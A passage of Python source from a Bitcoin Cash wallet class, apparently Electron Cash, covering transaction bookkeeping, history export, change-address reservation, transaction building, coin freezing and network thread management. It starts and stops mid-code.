# Paranoia; intended side effect of the below assert
# is to also deserialize the tx (by calling the slow
# .txid()) which ensures the tx from the server
# is not junk.
assert prevout_hash == tx.txid(), "txid mismatch"
Transaction.tx_cache_put(tx, prevout_hash) # will cache a copy
except Exception as e:
self.print_error(f"{me.name}: Error retrieving txid", prevout_hash, ":", repr(e))
if not keep_running(): # in case we got a network timeout *and* the wallet was closed
return
continue
if not keep_running():
return
for prevout_n in s.copy():
ser = mkser(prevout_hash, prevout_n)
try:
txo = tx.outputs()[prevout_n]
except IndexError:
self.print_error(f"{me.name}: ERROR -- could not find output", ser)
rm(ser, True, tup=(prevout_hash, prevout_n))
continue
_typ, addr, v = txo
rm_pruned_too = False
with self.lock:
mine = self.is_mine(addr)
if not mine and ser in self.pruned_txo:
ct += 1
rm_pruned_too = True
rm(ser, rm_pruned_too, tup=(prevout_hash, prevout_n))
if rm_pruned_too and debug:
self.print_error(f"{me.name}: DEBUG removed", ser)
if ct:
with self.lock:
# Save changes to storage -- this is cheap and doesn't
# actually write to file yet, just flags storage as
# 'dirty' for when wallet.storage.write() is called
# later.
self.storage.put('pruned_txo', self.pruned_txo)
self.print_error(f"{me.name}: removed", ct,
"(non-relevant) pruned_txo's in",
f'{time.time()-t0:3.2f}', "seconds")
except:
import traceback
self.print_error(f"{me.name}:", traceback.format_exc())
raise
finally:
self.print_error(f"{me.name}: thread exiting")
def add_transaction(self, tx_hash, tx):
if not tx.inputs():
# bad tx came in off the wire -- all 0's or something, see #987
self.print_error("add_transaction: WARNING a tx came in from the network with 0 inputs!"
" Bad server? Ignoring tx:", tx_hash)
return
is_coinbase = tx.inputs()[0]['type'] == 'coinbase'
with self.lock:
# HELPER FUNCTIONS
def add_to_self_txi(tx_hash, addr, ser, v):
''' addr must be 'is_mine' '''
d = self.txi.get(tx_hash)
if d is None:
self.txi[tx_hash] = d = {}
l = d.get(addr)
if l is None:
d[addr] = l = []
l.append((ser, v))
def find_in_self_txo(prevout_hash: str, prevout_n: int) -> tuple:
"""Returns a tuple of the (Address,value) for a given
prevout_hash:prevout_n, or (None, None) if not found. If valid
return, the Address object is found by scanning self.txo. The
lookup below is relatively fast in practice even on pathological
wallets."""
dd = self.txo.get(prevout_hash, {})
for addr2, item in dd.items():
for n, v, is_cb in item:
if n == prevout_n:
return addr2, v
return (None, None)
def txin_get_info(txi):
prevout_hash = txi['prevout_hash']
prevout_n = txi['prevout_n']
ser = f'{prevout_hash}:{prevout_n}'
return prevout_hash, prevout_n, ser
def put_pruned_txo(ser, tx_hash):
self.pruned_txo[ser] = tx_hash
self.pruned_txo_values.add(tx_hash)
t = self.pruned_txo_cleaner_thread
if t and t.q: t.q.put(ser)
def pop_pruned_txo(ser):
next_tx = self.pruned_txo.pop(ser, None)
if next_tx:
self.pruned_txo_values.discard(next_tx)
t = self.pruned_txo_cleaner_thread
if t and t.q: t.q.put('r_' + ser) # notify of removal
return next_tx
# /HELPER FUNCTIONS
# add inputs
self.txi[tx_hash] = d = {}
for txi in tx.inputs():
if txi['type'] == 'coinbase':
continue
addr = txi.get('address')
# find value from prev output
if self.is_mine(addr):
prevout_hash, prevout_n, ser = txin_get_info(txi)
dd = self.txo.get(prevout_hash, {})
for n, v, is_cb in dd.get(addr, []):
if n == prevout_n:
add_to_self_txi(tx_hash, addr, ser, v)
break
else:
# Coin's spend tx came in before its receive tx: flag
# the spend for when the receive tx will arrive into
# this function later.
put_pruned_txo(ser, tx_hash)
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
del dd, prevout_hash, prevout_n, ser
elif addr is None:
# Unknown/unparsed address.. may be a strange p2sh scriptSig
# Try and find it in txout's if it's one of ours.
# See issue #895.
prevout_hash, prevout_n, ser = txin_get_info(txi)
# Find address in self.txo for this prevout_hash:prevout_n
addr2, v = find_in_self_txo(prevout_hash, prevout_n)
if addr2 is not None and self.is_mine(addr2):
add_to_self_txi(tx_hash, addr2, ser, v)
self._addr_bal_cache.pop(addr2, None) # invalidate cache entry
else:
# Not found in self.txo. It may still be one of ours
# however since tx's can come in out of order due to
# CTOR, etc, and self.txo may not have it yet. So we
# flag the spend now, and when the out-of-order prevout
# tx comes in later for this input (if it's indeed one
# of ours), the real address for this input will get
# picked up then in the "add outputs" section below in
# this function. At that point, self.txi will be
# properly updated to indicate the coin in question was
# spent via an add_to_self_txi call.
#
# If it's *not* one of ours, however, the below will
# grow pruned_txo with an irrelevant entry. However, the
# irrelevant entry will eventually be reaped and removed
# by the self.pruned_txo_cleaner_thread which runs
# periodically in the background.
put_pruned_txo(ser, tx_hash)
del addr2, v, prevout_hash, prevout_n, ser
# don't keep empty entries in self.txi
if not d:
self.txi.pop(tx_hash, None)
# add outputs
self.txo[tx_hash] = d = {}
op_return_ct = 0
deferred_cashacct_add = None
for n, txo in enumerate(tx.outputs()):
ser = tx_hash + ':%d'%n
_type, addr, v = txo
mine = False
if isinstance(addr, ScriptOutput):
if addr.is_opreturn():
op_return_ct += 1
if isinstance(addr, cashacct.ScriptOutput):
# auto-detect CashAccount registrations we see,
# and notify cashacct subsystem of that fact. But we
# can only do it after making sure it's the *only*
# OP_RETURN in the tx.
deferred_cashacct_add = (
lambda _tx_hash=tx_hash, _tx=tx, _addr=addr:
self.cashacct.add_transaction_hook(_tx_hash, _tx, _addr)
)
elif self.is_mine(addr):
# add coin to self.txo since it's mine.
mine = True
l = d.get(addr)
if l is None:
d[addr] = l = []
l.append((n, v, is_coinbase))
del l
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
# give v to txi that spends me
next_tx = pop_pruned_txo(ser)
if next_tx is not None and mine:
add_to_self_txi(next_tx, addr, ser, v)
# don't keep empty entries in self.txo
if not d:
self.txo.pop(tx_hash, None)
# save
self.transactions[tx_hash] = tx
# Invoke the cashacct add hook (if defined) here at the end, with
# the lock held. We accept the cashacct.ScriptOutput only iff
# op_return_ct == 1 as per the Cash Accounts spec.
# See: https://gitlab.com/cash-accounts/lookup-server/blob/master/routes/parser.js#L253
if op_return_ct == 1 and deferred_cashacct_add:
deferred_cashacct_add()
# Unconditionally invoke the SLP handler. Note that it is a fast &
# cheap no-op if this tx's outputs[0] is not an SLP script.
self.slp.add_tx(tx_hash, tx)
def remove_transaction(self, tx_hash):
with self.lock:
self.print_error("removing tx from history", tx_hash)
# Note that we don't actually remove the tx_hash from
# self.transactions, but instead rely on the unreferenced tx being
# removed the next time the wallet is loaded in self.load_transactions()
for ser, hh in list(self.pruned_txo.items()):
if hh == tx_hash:
self.pruned_txo.pop(ser)
self.pruned_txo_values.discard(hh)
# add tx to pruned_txo, and undo the txi addition
for next_tx, dd in self.txi.items():
for addr, l in list(dd.items()):
ll = l[:]
for item in ll:
ser, v = item
prev_hash, prev_n = ser.split(':')
if prev_hash == tx_hash:
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
l.remove(item)
self.pruned_txo[ser] = next_tx
self.pruned_txo_values.add(next_tx)
if l == []:
dd.pop(addr)
else:
dd[addr] = l
# invalidate addr_bal_cache for outputs involving this tx
d = self.txo.get(tx_hash, {})
for addr in d:
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
try: self.txi.pop(tx_hash)
except KeyError: self.print_error("tx was not in input history", tx_hash)
try: self.txo.pop(tx_hash)
except KeyError: self.print_error("tx was not in output history", tx_hash)
# do this with the lock held
self.cashacct.remove_transaction_hook(tx_hash)
# inform slp subsystem as well
self.slp.rm_tx(tx_hash)
def receive_tx_callback(self, tx_hash, tx, tx_height):
self.add_transaction(tx_hash, tx)
self.add_unverified_tx(tx_hash, tx_height)
if self.network and self.network.callback_listener_count("payment_received") > 0:
for _, addr, _ in tx.outputs():
status = self.get_request_status(addr) # returns PR_UNKNOWN quickly if addr has no requests, otherwise returns tuple
if status != PR_UNKNOWN:
status = status[0] # unpack status from tuple
self.network.trigger_callback('payment_received', self, addr, status)
def receive_history_callback(self, addr, hist, tx_fees):
with self.lock:
old_hist = self.get_address_history(addr)
for tx_hash, height in old_hist:
if (tx_hash, height) not in hist:
s = self.tx_addr_hist.get(tx_hash)
if s:
s.discard(addr)
if not s:
# if no address references this tx anymore, kill it
# from txi/txo dicts.
if s is not None:
# We won't keep empty sets around.
self.tx_addr_hist.pop(tx_hash)
# note this call doesn't actually remove the tx from
# storage, it merely removes it from the self.txi
# and self.txo dicts
self.remove_transaction(tx_hash)
self._addr_bal_cache.pop(addr, None) # unconditionally invalidate cache entry
self._history[addr] = hist
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
# add reference in tx_addr_hist
self.tx_addr_hist[tx_hash].add(addr)
# if addr is new, we have to recompute txi and txo
tx = self.transactions.get(tx_hash)
if tx is not None and self.txi.get(tx_hash, {}).get(addr) is None and self.txo.get(tx_hash, {}).get(addr) is None:
self.add_transaction(tx_hash, tx)
# Store fees
self.tx_fees.update(tx_fees)
if self.network:
self.network.trigger_callback('on_history', self)
def add_tx_to_history(self, txid):
with self.lock:
for addr in itertools.chain(list(self.txi.get(txid, {}).keys()), list(self.txo.get(txid, {}).keys())):
cur_hist = self._history.get(addr, list())
if not any(True for x in cur_hist if x[0] == txid):
cur_hist.append((txid, 0))
self._history[addr] = cur_hist
def get_history(self, domain=None, *, reverse=False):
# get domain
if domain is None:
domain = self.get_addresses()
# 1. Get the history of each address in the domain, maintain the
# delta of a tx as the sum of its deltas on domain addresses
tx_deltas = defaultdict(int)
for addr in domain:
h = self.get_address_history(addr)
for tx_hash, height in h:
delta = self.get_tx_delta(tx_hash, addr)
if delta is None or tx_deltas[tx_hash] is None:
tx_deltas[tx_hash] = None
else:
tx_deltas[tx_hash] += delta
# 2. create sorted history
history = []
for tx_hash in tx_deltas:
delta = tx_deltas[tx_hash]
height, conf, timestamp = self.get_tx_height(tx_hash)
history.append((tx_hash, height, conf, timestamp, delta))
history.sort(key = lambda x: self.get_txpos(x[0]), reverse=True)
# 3. add balance
c, u, x = self.get_balance(domain)
balance = c + u + x
h2 = []
for tx_hash, height, conf, timestamp, delta in history:
h2.append((tx_hash, height, conf, timestamp, delta, balance))
if balance is None or delta is None:
balance = None
else:
balance -= delta
if not reverse:
h2.reverse()
return h2
def export_history(self, domain=None, from_timestamp=None, to_timestamp=None, fx=None,
show_addresses=False, decimal_point=8,
*, fee_calc_timeout=10.0, download_inputs=False,
progress_callback=None):
''' Export history. Used by RPC & GUI.
Arg notes:
- `fee_calc_timeout` is used when computing the fee (which is done
asynchronously in another thread) to limit the total amount of time in
seconds spent waiting for fee calculation. The timeout is a total time
allotment for this function call. (The reason the fee calc can take a
long time is for some pathological tx's, it is very slow to calculate
fee as it involves deserializing prevout_tx from the wallet, for each
input).
- `download_inputs`, if True, will allow for more accurate fee data to
be exported with the history by using the Transaction class input
fetcher to download *all* prevout_hash tx's for inputs (even for
inputs not in wallet). This feature requires self.network (ie, we need
to be online) otherwise it will behave as if download_inputs=False.
- `progress_callback`, if specified, is a callback which receives a
single float argument in the range [0.0,1.0] indicating how far along
the history export is going. This is intended for interop with GUI
code. Node the progress callback is not guaranteed to be called in the
context of the main thread, therefore GUI code should use appropriate
signals/slots to update the GUI with progress info.
Note on side effects: This function may update self.tx_fees. Rationale:
it will spend some time trying very hard to calculate accurate fees by
examining prevout_tx's (leveraging the fetch_input_data code in the
Transaction class). As such, it is worthwhile to cache the results in
self.tx_fees, which gets saved to wallet storage. This is not very
demanding on storage as even for very large wallets with huge histories,
tx_fees does not use more than a few hundred kb of space. '''
from .util import timestamp_to_datetime
# we save copies of tx's we deserialize to this temp dict because we do
# *not* want to deserialize tx's in wallet.transactoins since that
# wastes memory
local_tx_cache = {}
# some helpers for this function
t0 = time.time()
def time_remaining(): return max(fee_calc_timeout - (time.time()-t0), 0)
class MissingTx(RuntimeError):
''' Can happen in rare circumstances if wallet history is being
radically reorged by network thread while we are in this code. '''
def get_tx(tx_hash):
''' Try to get a tx from wallet, then from the Transaction class
cache if that fails. In either case it deserializes the copy and
puts the deserialized tx in local stack dict local_tx_cache. The
reason we don't deserialize the tx's from self.transactions is that
we do not want to keep deserialized tx's in memory. The
self.transactions dict should contain just raw tx's (not
deserialized). Deserialized tx's eat on the order of 10x the memory
because because of the Python lists, dict, etc they contain, per
instance. '''
tx = local_tx_cache.get(tx_hash)
if tx:
return tx
tx = Transaction.tx_cache_get(tx_hash)
if not tx:
tx = copy.deepcopy(self.transactions.get(tx_hash))
if tx:
tx.deserialize()
local_tx_cache[tx_hash] = tx
else:
raise MissingTx(f'txid {tx_hash} dropped out of wallet history while exporting')
return tx
def try_calc_fee(tx_hash):
''' Try to calc fee from cheapest to most expensive calculation.
Ultimately asks the transaction class to look at prevouts in wallet and uses
that scheme as a last (more CPU intensive) resort. '''
fee = self.tx_fees.get(tx_hash)
if fee is not None:
return fee
def do_get_fee(tx_hash):
tx = get_tx(tx_hash)
def try_get_fee(tx):
try: return tx.get_fee()
except InputValueMissing: pass
fee = try_get_fee(tx)
t_remain = time_remaining()
if fee is None and t_remain:
q = queue.Queue()
def done():
q.put(1)
tx.fetch_input_data(self, use_network=bool(download_inputs), done_callback=done)
try: q.get(timeout=t_remain)
except queue.Empty: pass
fee = try_get_fee(tx)
return fee
fee = do_get_fee(tx_hash)
if fee is not None:
self.tx_fees[tx_hash] = fee # save fee to wallet if we bothered to dl/calculate it.
return fee
def fmt_amt(v, is_diff):
if v is None:
return '--'
return format_satoshis(v, decimal_point=decimal_point,
is_diff=is_diff)
# grab history
h = self.get_history(domain, reverse=True)
out = []
n, l = 0, max(1, float(len(h)))
for tx_hash, height, conf, timestamp, value, balance in h:
if progress_callback:
progress_callback(n/l)
n += 1
timestamp_safe = timestamp
if timestamp is None:
timestamp_safe = time.time() # set it to "now" so below code doesn't explode.
if from_timestamp and timestamp_safe < from_timestamp:
continue
if to_timestamp and timestamp_safe >= to_timestamp:
continue
try:
fee = try_calc_fee(tx_hash)
except MissingTx as e:
self.print_error(str(e))
continue
item = {
'txid' : tx_hash,
'height' : height,
'confirmations' : conf,
'timestamp' : timestamp_safe,
'value' : fmt_amt(value, is_diff=True),
'fee' : fmt_amt(fee, is_diff=False),
'balance' : fmt_amt(balance, is_diff=False),
}
if item['height'] > 0:
date_str = format_time(timestamp) if timestamp is not None else _("unverified")
else:
date_str = _("unconfirmed")
item['date'] = date_str
try:
# Defensive programming.. sanitize label.
# The below ensures strings are utf8-encodable. We do this
# as a paranoia measure.
item['label'] = self.get_label(tx_hash).encode(encoding='utf-8', errors='replace').decode(encoding='utf-8', errors='replace')
except UnicodeError:
self.print_error(f"Warning: could not export label for {tx_hash}, defaulting to ???")
item['label'] = "???"
if show_addresses:
tx = get_tx(tx_hash)
input_addresses = []
output_addresses = []
for x in tx.inputs():
if x['type'] == 'coinbase': continue
addr = x.get('address')
if addr == None: continue
input_addresses.append(addr.to_full_ui_string())
for _type, addr, v in tx.outputs():
output_addresses.append(addr.to_full_ui_string())
item['input_addresses'] = input_addresses
item['output_addresses'] = output_addresses
if fx is not None:
date = timestamp_to_datetime(timestamp_safe)
item['fiat_value'] = fx.historical_value_str(value, date)
item['fiat_balance'] = fx.historical_value_str(balance, date)
item['fiat_fee'] = fx.historical_value_str(fee, date)
out.append(item)
if progress_callback:
progress_callback(1.0) # indicate done, just in case client code expects a 1.0 in order to detect completion
return out
def get_label(self, tx_hash):
label = self.labels.get(tx_hash, '')
if not label:
label = self.get_default_label(tx_hash)
return label
def get_default_label(self, tx_hash):
if not self.txi.get(tx_hash):
d = self.txo.get(tx_hash, {})
labels = []
for addr in list(d.keys()): # use a copy to avoid possibility of dict changing during iteration, see #1328
label = self.labels.get(addr.to_storage_string())
if label:
labels.append(label)
return ', '.join(labels)
return ''
def get_tx_status(self, tx_hash, height, conf, timestamp):
"""Return a status value and status string.
Meaning of the status flag:
- 0: unconfirmed parent
- 1: status no longer used (it used to mean low fee for BTC)
- 2: unconfirmed
- 3: not verified (included in latest block)
- 4: verified by 1 block
- 5: verified by 2 blocks
- 6: verified by 3 blocks
- 7: verified by 4 blocks
- 8: verified by 5 blocks
- 9: verified by 6 blocks or more
"""
if conf == 0:
tx = self.transactions.get(tx_hash)
if not tx:
status = 3
status_str = 'unknown'
elif height < 0:
status = 0
status_str = 'Unconfirmed parent'
elif height == 0:
status = 2
status_str = 'Unconfirmed'
else:
status = 3
status_str = 'Not Verified'
else:
status = 3 + min(conf, 6)
status_str = format_time(timestamp) if timestamp else _("unknown")
return status, status_str
def relayfee(self):
return relayfee(self.network)
def dust_threshold(self):
return dust_threshold(self.network)
def reserve_change_addresses(self, count, temporary=False):
""" Reserve and return `count` change addresses. In order
of preference, this will return from:
1. addresses 'freed' by `.unreserve_change_address`,
2. addresses in the last 20 (gap limit) of the change list,
3. newly-created addresses.
Of these, only unlabeled, unreserved addresses with no usage history
will be returned. If you pass temporary=False (default), this will
persist upon wallet saving, otherwise with temporary=True the address
will be made available again once the wallet is re-opened.
On non-deterministic wallets, this returns an empty list.
"""
if count <= 0 or not hasattr(self, 'create_new_address'):
return []
with self.lock:
last_change_addrs = self.get_change_addresses()[-self.gap_limit_for_change:]
if not last_change_addrs:
# this happens in non-deterministic wallets but the above
# hasattr check should have caught those.
return []
def gen_change():
try:
while True:
yield self.change_unreserved.pop(0)
except IndexError:
pass
for addr in last_change_addrs:
yield addr
while True:
yield self.create_new_address(for_change=True)
result = []
for addr in gen_change():
if ( addr in self.change_reserved
or addr in self.change_reserved_tmp
or self.get_num_tx(addr) != 0
or addr in result):
continue
addr_str = addr.to_storage_string()
if self.labels.get(addr_str):
continue
result.append(addr)
if temporary:
self.change_reserved_tmp.add(addr)
else:
self.change_reserved.add(addr)
if len(result) >= count:
return result
raise RuntimeError("Unable to generate new addresses") # should not happen
def unreserve_change_address(self, addr):
""" Unreserve an addr that was set by reserve_change_addresses, and
also explicitly reschedule this address to be usable by a future
reservation. Unreserving is appropriate when the address was never
actually shared or used in a transaction, and reduces empty gaps in
the change list.
"""
assert addr in self.get_change_addresses()
with self.lock:
self.change_reserved.discard(addr)
self.change_reserved_tmp.discard(addr)
self.change_unreserved.append(addr)
def get_default_change_addresses(self, count):
""" Return `count` change addresses from the default reserved list,
ignoring and removing used addresses. Reserves more as needed.
The same default change addresses keep getting repeated until they are
actually seen as used in a transaction from the network. Theoretically
this could hurt privacy if the user has multiple unsigned transactions
open at the same time, but practically this avoids address gaps for
normal usage. If you need non-repeated addresses, see
`reserve_change_addresses`.
On non-deterministic wallets, this returns an empty list.
"""
result = []
with self.lock:
for addr in list(self.change_reserved_default):
if len(result) >= count:
break
if self.get_num_tx(addr) != 0:
self.change_reserved_default.remove(addr)
continue
result.append(addr)
need_more = count - len(result)
if need_more > 0:
new_addrs = self.reserve_change_addresses(need_more)
self.change_reserved_default.extend(new_addrs)
result.extend(new_addrs)
return result
def make_unsigned_transaction(self, inputs, outputs, config, fixed_fee=None, change_addr=None, sign_schnorr=None):
''' sign_schnorr flag controls whether to mark the tx as signing with
schnorr or not. Specify either a bool, or set the flag to 'None' to use
whatever the wallet is configured to use from the GUI '''
sign_schnorr = self.is_schnorr_enabled() if sign_schnorr is None else bool(sign_schnorr)
# check outputs
i_max = None
for i, o in enumerate(outputs):
_type, data, value = o
if value == '!':
if i_max is not None:
raise BaseException("More than one output set to spend max")
i_max = i
# Avoid index-out-of-range with inputs[0] below
if not inputs:
raise NotEnoughFunds()
if fixed_fee is None and config.fee_per_kb() is None:
raise BaseException('Dynamic fee estimates not available')
for item in inputs:
self.add_input_info(item)
# Fee estimator
if fixed_fee is None:
fee_estimator = config.estimate_fee
else:
fee_estimator = lambda size: fixed_fee
if i_max is None:
# Let the coin chooser select the coins to spend
change_addrs = []
if change_addr:
change_addrs = [change_addr]
else:
# Currently the only code that uses this hook is the deprecated
# Cash Shuffle plugin
change_addrs = run_hook("get_change_addrs", self) or []
if not change_addrs:
# hook gave us nothing, so find a change addr from the change
# reservation subsystem
max_change = self.max_change_outputs if self.multiple_change else 1
if self.use_change:
change_addrs = self.get_default_change_addresses(max_change)
else:
change_addrs = []
if not change_addrs:
# For some reason we couldn't get any autogenerated change
# address (non-deterministic wallet?). So, try to find an
# input address that belongs to us.
for inp in inputs:
backup_addr = inp['address']
if self.is_mine(backup_addr):
change_addrs = [backup_addr]
break
else:
# ok, none of the inputs are "mine" (why?!) -- fall back
# to picking first max_change change_addresses that have
# no history
change_addrs = []
for addr in self.get_change_addresses()[-self.gap_limit_for_change:]:
if self.get_num_tx(addr) == 0:
change_addrs.append(addr)
if len(change_addrs) >= max_change:
break
if not change_addrs:
# No unused wallet addresses or no change addresses.
# Fall back to picking ANY wallet address
try:
# Pick a random address
change_addrs = [random.choice(self.get_addresses())]
except IndexError:
change_addrs = [] # Address-free wallet?!
# This should never happen
if not change_addrs:
raise RuntimeError("Can't find a change address!")
assert all(isinstance(addr, Address) for addr in change_addrs)
coin_chooser = coinchooser.CoinChooserPrivacy()
tx = coin_chooser.make_tx(inputs, outputs, change_addrs,
fee_estimator, self.dust_threshold(), sign_schnorr=sign_schnorr)
else:
sendable = sum(map(lambda x:x['value'], inputs))
_type, data, value = outputs[i_max]
outputs[i_max] = (_type, data, 0)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = fee_estimator(tx.estimated_size())
amount = max(0, sendable - tx.output_value() - fee)
outputs[i_max] = (_type, data, amount)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
# If user tries to send too big of a fee (more than 50 sat/byte), stop them from shooting themselves in the foot
tx_in_bytes=tx.estimated_size()
fee_in_satoshis=tx.get_fee()
sats_per_byte=fee_in_satoshis/tx_in_bytes
if (sats_per_byte > 100):
raise ExcessiveFee()
# Sort the inputs and outputs deterministically
tx.BIP_LI01_sort()
# Timelock tx to current height.
locktime = self.get_local_height()
if locktime == -1: # We have no local height data (no headers synced).
locktime = 0
tx.locktime = locktime
run_hook('make_unsigned_transaction', self, tx)
return tx
def mktx(self, outputs, password, config, fee=None, change_addr=None, domain=None, sign_schnorr=None):
coins = self.get_spendable_coins(domain, config)
tx = self.make_unsigned_transaction(coins, outputs, config, fee, change_addr, sign_schnorr=sign_schnorr)
self.sign_transaction(tx, password)
return tx
def is_frozen(self, addr):
""" Address-level frozen query. Note: this is set/unset independent of
'coin' level freezing. """
assert isinstance(addr, Address)
return addr in self.frozen_addresses
def is_frozen_coin(self, utxo: Union[str, dict, Set[str]]) -> Union[bool, Set[str]]:
""" 'coin' level frozen query. Note: this is set/unset independent of
address-level freezing.
`utxo` is a prevout:n string, or a dict as returned from get_utxos(),
in which case a bool is returned.
`utxo` may also be a set of prevout:n strings in which case a set is
returned which is the intersection of the internal frozen coin sets
and the `utxo` set. """
assert isinstance(utxo, (str, dict, set))
if isinstance(utxo, dict):
name = ("{}:{}".format(utxo['prevout_hash'], utxo['prevout_n']))
ret = name in self.frozen_coins or name in self.frozen_coins_tmp
if ret != utxo['is_frozen_coin']:
self.print_error("*** WARNING: utxo has stale is_frozen_coin flag", name)
utxo['is_frozen_coin'] = ret # update stale flag
return ret
elif isinstance(utxo, set):
# set is returned
return (self.frozen_coins | self.frozen_coins_tmp) & utxo
else:
return utxo in self.frozen_coins or utxo in self.frozen_coins_tmp
def set_frozen_state(self, addrs, freeze):
"""Set frozen state of the addresses to `freeze`, True or False. Note
that address-level freezing is set/unset independent of coin-level
freezing, however both must be satisfied for a coin to be defined as
spendable."""
if all(self.is_mine(addr) for addr in addrs):
if freeze:
self.frozen_addresses |= set(addrs)
else:
self.frozen_addresses -= set(addrs)
frozen_addresses = [addr.to_storage_string()
for addr in self.frozen_addresses]
self.storage.put('frozen_addresses', frozen_addresses)
return True
return False
def set_frozen_coin_state(self, utxos, freeze, *, temporary=False):
"""Set frozen state of the `utxos` to `freeze`, True or False. `utxos`
is a (possibly mixed) list of either "prevout:n" strings and/or
coin-dicts as returned from get_utxos(). Note that if passing prevout:n
strings as input, 'is_mine()' status is not checked for the specified
coin. Also note that coin-level freezing is set/unset independent of
address-level freezing, however both must be satisfied for a coin to be
defined as spendable.
The `temporary` flag only applies if `freeze = True`. In that case,
freezing coins will only affect the in-memory-only frozen set, which
doesn't get saved to storage. This mechanism was added so that plugins
(such as CashFusion) have a mechanism for ephemeral coin freezing that
doesn't persist across sessions.
Note that setting `freeze = False` effectively unfreezes both the
temporary and the permanent frozen coin sets all in 1 call. Thus after a
call to `set_frozen_coin_state(utxos, False), both the temporary and the
persistent frozen sets are cleared of all coins in `utxos`."""
add_set = self.frozen_coins if not temporary else self.frozen_coins_tmp
def add(utxo):
add_set.add(utxo)
def discard(utxo):
self.frozen_coins.discard(utxo)
self.frozen_coins_tmp.discard(utxo)
apply_operation = add if freeze else discard
original_size = len(self.frozen_coins)
with self.lock:
ok = 0
for utxo in utxos:
if isinstance(utxo, str):
apply_operation(utxo)
ok += 1
elif isinstance(utxo, dict):
txo = "{}:{}".format(utxo['prevout_hash'], utxo['prevout_n'])
apply_operation(txo)
utxo['is_frozen_coin'] = bool(freeze)
ok += 1
if original_size != len(self.frozen_coins):
# Performance optimization: only set storage if the perma-set
# changed.
self.storage.put('frozen_coins', list(self.frozen_coins))
return ok
def prepare_for_verifier(self):
# review transactions that are in the history
for addr, hist in self._history.items():
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
# if we are on a pruning server, remove unverified transactions
with self.lock:
vr = list(self.verified_tx.keys()) + list(self.unverified_tx.keys())
for tx_hash in list(self.transactions):
if tx_hash not in vr:
self.print_error("removing transaction", tx_hash)
self.transactions.pop(tx_hash)
def start_threads(self, network):
self.network = network
if self.network:
self.start_pruned_txo_cleaner_thread()
self.prepare_for_verifier()
self.verifier = SPV(self.network, self)
self.synchronizer = Synchronizer(self, network)
finalization_print_error(self.verifier)
finalization_print_error(self.synchronizer)
network.add_jobs([self.verifier, self.synchronizer])
self.cashacct.start(self.network) # start cashacct network-dependent subsystem, nework.add_jobs, etc
else:
self.verifier = None
self.synchronizer = None
def stop_threads(self):
if self.network:
# Note: syncrhonizer and verifier will remove themselves from the
# network thread the next time they run, as a result of the below
# release() calls.
# It is done this way (as opposed to an immediate clean-up here)
# because these objects need to do thier clean-up actions in a
# thread-safe fashion from within the thread where they normally
# operate on their data structures.
self.cashacct.stop()
self.synchronizer.release()
self.verifier.release()
self.synchronizer = None
self.verifier = None
self.stop_pruned_txo_cleaner_thread()
# Now no references to the syncronizer or verifier
# remain so they will be GC-ed
self.storage.put('stored_height', self.get_local_height())
self.save_addresses()
self.save_transactions()
self.save_verified_tx() # implicit cashacct.save
self.storage.put('frozen_coins', list(self.frozen_coins))
self.save_change_reservations()
self.storage.write()
def start_pruned_txo_cleaner_thread(self):
self.pruned_txo_cleaner_thread = threading.Thread(target=self._clean_pruned_txo_thread, daemon=True, name='clean_pruned_txo_thread')
self.pruned_txo_cleaner_thread.q = queue.Queue()
self.pruned_txo_cleaner_thread.start()
def stop_pruned_txo_cleaner_thread(self):
t = self.pruned_txo_cleaner_thread
self.pruned_txo_cleaner_thread = None # this also signals a stop
if t and t.is_alive():
t.q.put(None) # signal stop
# if the join times out, it's ok. it means the thread was stuck in
# a network call and it will eventually exit.
t.join(timeout=3.0)
def wait_until_synchronized(self, callback=None, *, timeout=None):
tstart = time.time()
def check_timed_out():
if timeout is not None and time.time() - tstart > timeout:
raise TimeoutException()
def wait_for_wallet():
self.set_up_to_date(False)
while not self.is_up_to_date():
if callback:
msg = "%s\n%s %d"%(
_("Please wait..."),
_("Addresses generated:"),
len(self.addresses(True)))
callback(msg)
time.sleep(0.1)
check_timed_out()
def wait_for_network():
while not self.network.is_connected():
if callback:
msg = "%s \n" % (_("Connecting..."))
callback(msg)
time.sleep(0.1)
check_timed_out()
# wait until we are connected, because the user
# might have selected another server
if self.network:
wait_for_network()
wait_for_wallet()
else:
self.synchronize()
def can_export(self):
return not self.is_watching_only() and hasattr(self.keystore, 'get_private_key')
def is_used(self, address):
return self.get_address_history(address) and self.is_empty(address)
def is_empty(self, address):
assert isinstance(address, Address)
return not any(self.get_addr_balance(address))
def address_is_old(self, address, age_limit=2):
age = -1
local_height = self.get_local_height()
for tx_hash, tx_height in self.get_address_history(address):
if tx_height == 0:
tx_age = 0
else:
tx_age = local_height - tx_height + 1
if tx_age > age:
age = tx_age
if age > age_limit:
break # ok, it's old. not need to keep looping
return age > age_limit
def cpfp(self, tx, fee, sign_schnorr=None):
''' sign_schnorr is a bool or None for auto '''
sign_schnorr = self.is_schnorr_enabled() if sign_schnorr is None else bool(sign_schnorr)
txid = tx.txid()
for i, o in enumerate(tx.outputs()):
otype, address, value = o
if otype == bitcoin.TYPE_ADDRESS and self.is_mine(address):
break
else:
return
coins = self.get_addr_utxo(address)
item = coins.get(txid+':%d'%i)
if not item:
return
self.add_input_info(item)
inputs = [item]
outputs = [(bitcoin.TYPE_ADDRESS, address, value - fee)]
locktime = self.get_local_height()
# note: no need to call tx.BIP_LI01_sort() here - single input/output
return Transaction.from_io(inputs, outputs, locktime=locktime, sign_schnorr=sign_schnorr)
def add_input_info(self, txin):
address = txin['address']
if self.is_mine(address):
txin['type'] = self.get_txin_type(address)
# Bitcoin Cash needs value to sign
received, spent = self.get_addr_io(address)
item = received.get(txin['prevout_hash']+':%d'%txin['prevout_n'])
tx_height, value, is_cb = item
txin['value'] = value
self.add_input_sig_info(txin, address)
def can_sign(self, tx):
if tx.is_complete():
return False
for k in self.get_keystores():
# setup "wallet advice" so Xpub wallets know how to sign 'fd' type tx inputs
# by giving them the sequence number ahead of time
if isinstance(k, BIP32_KeyStore):
for txin in tx.inputs():
for x_pubkey in txin['x_pubkeys']:
_, addr = xpubkey_to_address(x_pubkey)
try:
c, index = self.get_address_index(addr)
except:
